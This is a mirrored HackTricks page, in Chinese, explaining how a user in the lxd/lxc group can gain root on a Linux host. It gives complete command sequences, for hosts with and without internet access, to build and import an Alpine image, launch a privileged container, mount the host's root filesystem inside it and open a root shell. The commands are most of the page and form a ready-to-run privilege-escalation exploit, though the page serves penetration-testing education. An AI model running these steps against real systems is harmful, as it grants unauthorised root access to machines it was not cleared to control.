Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-11-21 20:23:18 +00:00
Code Issues Projects Releases Packages Wiki Activity
hacktricks/linux-unix/privilege-escalation/lxd-privilege-escalation.md

3.9 KiB
Raw Permalink Blame History

从零到英雄学习AWS黑客攻击通过 htARTE (HackTricks AWS Red Team Expert)

支持HackTricks的其他方式

如果你属于 lxd lxc 你可以成为root

在没有互联网的情况下利用

你可以在你的机器上安装这个发行版构建器:https://github.com/lxc/distrobuilder (按照github的说明操作)

#Install requirements
sudo apt update
sudo apt install -y golang-go debootstrap rsync gpg squashfs-tools
#Clone repo
go get -d -v github.com/lxc/distrobuilder
#Make distrobuilder
cd $HOME/go/src/github.com/lxc/distrobuilder
make
cd
#Prepare the creation of alpine
mkdir -p $HOME/ContainerImages/alpine/
cd $HOME/ContainerImages/alpine/
wget https://raw.githubusercontent.com/lxc/lxc-ci/master/images/alpine.yaml
#Create the container
sudo $HOME/go/bin/distrobuilder build-lxd alpine.yaml

然后,将文件 lxd.tar.xzrootfs.squashfs 上传到服务器

添加镜像:

lxc image import lxd.tar.xz rootfs.squashfs --alias alpine
lxc image list #You can see your new imported image

创建一个容器并添加根路径

lxc init alpine privesc -c security.privileged=true
lxc list #List containers

lxc config device add privesc host-root disk source=/ path=/mnt/root recursive=true

执行容器:

lxc start privesc
lxc exec privesc /bin/sh
[email protected]:~# cd /mnt/root #Here is where the filesystem is mounted

有网络

您可以按照这些指示操作。

lxc init ubuntu:16.04 test -c security.privileged=true
lxc config device add test whatever disk source=/ path=/mnt/root recursive=true
lxc start test
lxc exec test bash
[email protected]:~# cd /mnt/root #Here is where the filesystem is mounted

其他参考资料

{% embed url="https://reboare.github.io/lxd/lxd-escape.html" caption="" %}

通过 htARTE (HackTricks AWS Red Team Expert)从零开始学习AWS黑客攻击直至成为专家

支持HackTricks的其他方式